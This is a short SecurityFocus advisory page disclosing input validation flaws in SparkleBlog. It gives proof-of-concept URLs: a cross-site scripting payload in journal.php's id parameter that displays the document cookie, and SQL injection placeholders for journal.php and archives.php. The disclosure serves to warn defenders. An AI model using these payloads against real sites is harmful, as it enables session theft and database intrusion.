Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

SparkleBlog Multiple Input Validation Vulnerabilities

No exploit is required to leverage these issues. The following proof of concepts have been provided:

Cross-Site Scripting
http://www.example.com/journal.php?id=document.write(unescape(%22%3CSCRIPT%3Ealert(document.domain);%3C/SCRIPT%3E%3CSCRIPT%3Ealert(document.cookie);%3C/SCRIPT%3E%22));

SQL Injection
http://www.example.com/journal.php?id='[SQL]
http://www.example.com/archives.php?id='[SQL]







 

Privacy Statement
Copyright 2009, SecurityFocus